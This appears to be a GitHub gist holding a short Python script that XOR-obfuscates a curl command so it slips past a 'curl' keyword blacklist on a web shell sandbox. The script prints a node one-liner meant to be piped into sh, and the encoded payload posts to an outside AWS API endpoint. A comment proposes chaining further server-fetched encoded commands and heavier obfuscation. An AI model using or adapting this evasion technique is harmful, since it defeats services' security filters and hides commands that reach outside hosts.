/obfuscate_curl.py
Created Aug 19, 2018
http://www.lambdashell.com/ uses `command.includes('curl')` to blacklist curl, such a check can be bypassed by piping the output of this script into sh
| from random import choices, seed | |
| from sys import argv | |
| payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev''' | |
| seed(argv[1]) | |
| obfuscation_key = choices(range(256), k=len(payload)) | |
| obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)] | |
| print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment